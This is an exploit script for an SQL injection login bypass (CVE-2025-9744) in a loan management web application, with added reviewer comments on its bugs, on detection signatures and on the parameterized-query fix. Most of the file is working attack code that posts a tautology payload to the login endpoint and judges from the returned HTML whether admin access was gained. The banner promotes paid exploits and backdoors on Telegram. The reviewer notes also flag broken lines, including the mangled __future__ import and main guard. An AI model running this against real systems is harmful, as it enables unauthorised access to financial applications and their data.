# -*- coding: utf-8 -*-
# Exploit [Loan Management System] v1.0 - SQL Injection
# Google Dork: N/A
# Date: 20/10/2025
# Exploit Author: CodeB0ss
# Vendor: Loan Management System
# Software Link: https://www.loanpro.io/
# Version: <= 1.0.0
# Tested on: Windows
# CVE : CVE-2025-9744
# CVSS Score : 10
#
# Single-target probe: one POST to the login endpoint followed by one GET of
# the home page, then string matching on the returned HTML to decide whether
# the login handler accepted a tautology in the username field.

# NOTE(review): the double underscores look stripped by page extraction; as
# written this imports a plain module named `future`, not the `__future__`
# directive. The same applies to the `if name == "main":` guard at the bottom.
from future import print_function
import requests
import sys

# Runtime banner; printed verbatim by main(). Kept byte-identical.
banner = ''' -#- bY t.me/uncodeboss CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection [Notification] : Become a VP user and get all the exploits and tools, backdoors t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw [Usage] : python CVE-2025-9744.py -u http/https or just example.com. '''

# Silences the per-request warning that `verify=False` (used below) triggers.
# The bare `except` swallows every failure, including an AttributeError on
# requests builds where `requests.packages.urllib3` is not exposed.
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass


def codeb0ssexp(codeb0ss_base):
    """Probe one host for the CVE-2025-9744 login bypass and print a verdict.

    Args:
        codeb0ss_base: hostname or URL; "http://" is prepended when no scheme
            is given, and a trailing "/" is stripped.

    Returns:
        0 when both response bodies match the heuristic markers (reported as
        "Vulnerable"), 2 when they do not, 1 on any requests transport error.
        main() passes this value straight to sys.exit().

    The verdict is purely heuristic (substring matching on HTML); it does not
    inspect session cookies or any server-side state.
    """
    if not codeb0ss_base.startswith("http://") and not codeb0ss_base.startswith("https://"):
        codeb0ss_base = "http://" + codeb0ss_base
    base_url = codeb0ss_base.rstrip("/")
    # One Session so the cookie set by the login POST is carried to the GET.
    cdb0s = requests.Session()
    # Fixed User-Agent: a stable signature for WAF/IDS rules and log review.
    cdb0s.headers.update({
        'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101 Firefox/113.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    })
    # ANSI colour codes are opened but never reset (no "\033[0m" anywhere in
    # this script), so the terminal stays coloured after the verdict line.
    red = "\033[91m"
    green = "\033[92m"
    post_path = "/ajax.php?action=login"
    get_path = "/index.php?page=home"
    post_url = base_url + post_path
    get_url = base_url + get_path
    # URL-encoded tautology with a trailing SQL comment marker in the username
    # field. A login handler that concatenates this into its query accepts it
    # regardless of the password; the vendor-side fix is a parameterized query
    # (prepared statement) for the login lookup. For detection, this encoded
    # string in a POST body to ajax.php?action=login is a precise signature.
    username = "admin'+or+'1'%3D'1'%23"
    password = "expbycodeb0ss"
    # Body is hand-built rather than passed as a dict, so requests does not
    # re-encode the already-encoded username.
    payload = "username={}&password={}".format(username, password)
    try:
        # verify=False disables TLS certificate validation on both requests.
        r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)
        r_get = cdb0s.get(get_url, timeout=10, verify=False)
        try:
            combined = (r_post.text or "") + (r_get.text or "")
        except Exception:
            # NOTE(review): on Python 3 `.content` is bytes, so with non-empty
            # bodies this builds a bytes value and the `str in combined`
            # checks below raise TypeError; the fallback only behaves as
            # intended on Python 2 (consistent with the print_function import).
            combined = (r_post.content or "") + (r_get.content or "")
        # All three markers must appear somewhere in the two bodies combined.
        group1 = ["window.start_load", "Welcome back Admin", "Loan Management System"]
        group1_ok = all(w in combined for w in group1)
        # NOTE(review): `combined` includes the login POST response itself; if
        # that response carries the login form markup, this check is satisfied
        # independently of whether the bypass worked.
        group2_ok = ("login-form" in combined)
        if group1_ok and group2_ok:
            print(" - " + base_url + " --> " + green + "Vulnerable")
            print(" - {}".format(post_url))
            print(" - {}".format(get_url))
            return 0
        else:
            print(" - " + base_url + " --> " + red + "Not_Vulnerable")
            return 2
    except requests.exceptions.RequestException as e:
        # Every transport failure (DNS, refused connection, TLS error, real
        # timeout) is reported under the same "Time0ut" label; `e` is unused.
        print(" - " + base_url + " --> " + red + "Time0ut")
        return 1


def startexp():
    """Return the argv value following `-u`, or None when absent.

    No validation is performed on the value; an empty string or a missing
    argument after `-u` both yield None (the latter via the bounds check).
    """
    if '-u' in sys.argv:
        idx = sys.argv.index('-u')
        if idx + 1 < len(sys.argv):
            return sys.argv[idx + 1]
    return None


def main():
    """Print the banner, read the target from argv and exit with the probe's code.

    Exits 1 when no target was supplied; otherwise the process exit status is
    the return value of codeb0ssexp() (0 / 1 / 2, see its docstring).
    """
    print(banner)
    target = startexp()
    if not target:
        sys.exit(1)
    rc = codeb0ssexp(target)
    sys.exit(rc)


# NOTE(review): presumably `if __name__ == "__main__":` with the underscores
# lost in extraction; as written, `name` is an undefined global.
if name == "main":
    main()